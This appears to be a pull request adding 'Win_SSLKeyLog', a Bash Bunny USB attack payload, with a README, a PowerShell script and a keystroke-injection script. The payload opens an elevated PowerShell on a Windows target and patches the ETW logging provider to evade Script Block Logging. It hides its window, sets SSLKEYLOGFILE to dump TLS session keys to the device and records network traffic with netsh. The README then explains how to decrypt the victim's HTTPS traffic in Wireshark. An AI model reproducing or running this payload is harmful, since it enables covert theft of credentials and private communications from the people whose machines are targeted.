### PR TITLE
Add Win_SSLKeyLog

### DIFF
--- a/payloads/library/credentials/win_sslkeylog/README.md
+++ b/payloads/library/credentials/win_sslkeylog/README.md
@@ -10,6 +10,7 @@
 
 >
 > Captures the client network session.
+> 
 > Captures the client side session keys.
 >
 
@@ -38,10 +39,10 @@ readonly SNIFFING_TIME=300
 ## Required
 
 Utility that converts an .etl file containing a Windows network packet capture into .pcapng format.
-[etl2pcapng](https://github.com/microsoft/etl2pcapng)
+[ETL2PCAPNG](https://github.com/microsoft/etl2pcapng)
 
 Wireshark network protocol analyzer.
-[wireshark](https://www.wireshark.org/)
+[WIRESHARK](https://www.wireshark.org/)
 
 ## Steps
 

--- a/payloads/library/credentials/win_sslkeylog/README.md
+++ b/payloads/library/credentials/win_sslkeylog/README.md
@@ -1,0 +1,62 @@
+# "Microsoft Windows" SSLKEYLOG
+
+- Title:         Win_SSLKeyLog
+- Author:        TW-D
+- Version:       1.0
+- Target:        Microsoft Windows
+- Category:      Credentials      
+
+## Description
+
+>
+> Captures the client network session.
+> Captures the client side session keys.
+>
+
+1) Partially avoids "PowerShell Script Block Logging".
+2) Closing of all windows.
+3) Hide "PowerShell" window.
+4) Check if current process have "Administrator" privilege.
+5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. 
+6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
+7) Writes the file system cache to disk.
+8) Safely eject.
+
+## Configuration
+
+From "payload.txt" change the values of the following constants :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly SNIFFING_TIME=300
+
+
+```
+
+## Required
+
+Utility that converts an .etl file containing a Windows network packet capture into .pcapng format.
+[etl2pcapng](https://github.com/microsoft/etl2pcapng)
+
+Wireshark network protocol analyzer.
+[wireshark](https://www.wireshark.org/)
+
+## Steps
+
+Convert "capture.etl" file into "capture.pcapng" with "etl2pcapng".
+```
+.\etl2pcapng.exe .\capture.etl .\capture.pcapng
+```
+
+Open your "capture.pcapng" with "Wireshark".
+
+Configure "Wireshark" for HTTPS decryption.
+```
+Edit - Preferences
+Protocols - (SSL and/or TLS)
+(Pre)-Master-Secret log filename -> Browse -> SSLKEYLOGFILE.txt
+```
+
+Happy hunting.

--- a/payloads/library/credentials/win_sslkeylog/payload.ps1
+++ b/payloads/library/credentials/win_sslkeylog/payload.ps1
@@ -1,0 +1,58 @@
+#
+# Author:       TW-D
+# Version:      1.0
+#
+
+Param (
+    [String] $BB_VOLUME,
+    [Int] $SNIFFING_TIME
+)
+
+# Partially avoids "PowerShell Script Block Logging".
+#
+$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
+$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
+$etw_provider.SetValue($null, $event_provider)
+
+# Closing of all windows.
+#
+Get-Process -Name "explorer" | Stop-Process
+    
+# Hide "PowerShell" window.
+#
+$Script:showWindowAsync = Add-Type -MemberDefinition @"
+[DllImport("user32.dll")]
+public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
+"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
+$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
+
+# Check if current process have "Administrator" privilege.
+#
+If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) {
+
+    $bb_loot = "${BB_VOLUME}loot\"
+    
+    # Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
+    #
+    [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
+    [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "${bb_loot}SSLKEYLOGFILE.txt", "User")
+
+    # Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
+    #
+    (NETSH trace start capture=yes report=no persistent=yes traceFile="${bb_loot}capture.etl" maxSize=0 fileMode=append) | Out-Null
+    Start-Sleep -Seconds $SNIFFING_TIME
+    (NETSH trace stop) | Out-Null
+
+    [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
+
+}
+
+"Win_SSLKeyLog terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
+
+# Writes the file system cache to disk (thanks to @dark_pyrro).
+#
+Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
+
+# Safely eject (thanks to @Night (9o3)).
+#
+(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")

--- a/payloads/library/credentials/win_sslkeylog/payload.txt
+++ b/payloads/library/credentials/win_sslkeylog/payload.txt
@@ -1,0 +1,108 @@
+#!/bin/bash
+#
+# Title:            Win_SSLKeyLog
+#
+# Description:      
+#                   Captures the client network session.
+#                   Captures the client side session keys.
+#
+#                   1) Partially avoids "PowerShell Script Block Logging".
+#                   2) Closing of all windows.
+#                   3) Hide "PowerShell" window.
+#                   4) Check if current process have "Administrator" privilege.
+#                   5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. 
+#                   6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
+#                   7) Writes the file system cache to disk (thanks to @dark_pyrro).
+#                   8) Safely eject (thanks to @Night (9o3)).
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Credentials
+# Target:           Microsoft Windows 10
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# REQUIREMENTS
+# ===============
+# The target user must belong to the 'Administrator' group.
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Cyan inverted single blink ...................... SPECIAL
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly SNIFFING_TIME=300
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 5000
+Q GUI r
+Q DELAY 5000
+Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 1500
+Q CTRL-SHIFT ENTER
+Q DELAY 5000
+Q LEFTARROW
+Q DELAY 3000
+Q ENTER
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
+Q ENTER
+Q DELAY 3500
+
+Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "CD \"\${BB_SWITCH}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -SNIFFING_TIME ${SNIFFING_TIME}"
+Q ENTER
+Q DELAY 1500
+
+LED SPECIAL
+
+until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+rm /root/udisk/loot/done.txt
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0


### PR DESCRIPTION
Captures the client network session.
Captures the client side session keys.

1) Partially avoids "PowerShell Script Block Logging".
2) Closing of all windows.
3) Hide "PowerShell" window.
4) Check if current process have "Administrator" privilege.
5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. 
6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
7) Writes the file system cache to disk (thanks to @dark_pyrro).
8) Safely eject (thanks to @Night (9o3)).